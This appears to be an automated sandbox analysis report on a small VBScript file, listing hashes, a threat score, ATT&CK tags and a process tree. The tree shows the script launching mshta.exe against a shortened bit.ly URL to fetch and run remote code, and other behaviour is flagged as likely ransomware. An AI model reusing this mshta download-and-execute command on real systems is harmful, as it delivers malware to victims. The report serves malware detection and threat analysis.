2b02f82aed2a34dafcb6e9419821f02387ad7fa26713822477e7d5260b5a9888

Analysis

Target

N41101255652.vbs
Size

222B
MD5

56f4f81251a3d6a6e5c97546d7847b2e
SHA1

bb5ff2453fc662f571aff2f530f6432ace23cc17
SHA256

2b02f82aed2a34dafcb6e9419821f02387ad7fa26713822477e7d5260b5a9888
SHA512

aa92f277440513b7e8b77c013fb41584eff6285313a9c17c16065af9b1158ef7eface5c57d65f25f480c7c764196e249dc09369ce44721a296d14e6692cc4ea9

Score

8^/10

Blocklisted process makes network request 4 IoCs

Processes:

mshta.exe

flow pid process

9 348 mshta.exe
11 348 mshta.exe
13 348 mshta.exe
15 348 mshta.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious use of WriteProcessMemory 2 IoCs

Processes:

WScript.exe

description pid process target process

PID 680 wrote to memory of 348 680 WScript.exe mshta.exe
PID 680 wrote to memory of 348 680 WScript.exe mshta.exe

description	pid	process	target process
PID 680 wrote to memory of 348	680	WScript.exe	mshta.exe
PID 680 wrote to memory of 348	680	WScript.exe	mshta.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\N41101255652.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:680
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" https://bit.ly/3kKbYz1
  2⤵
  - Blocklisted process makes network request
  PID:348

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact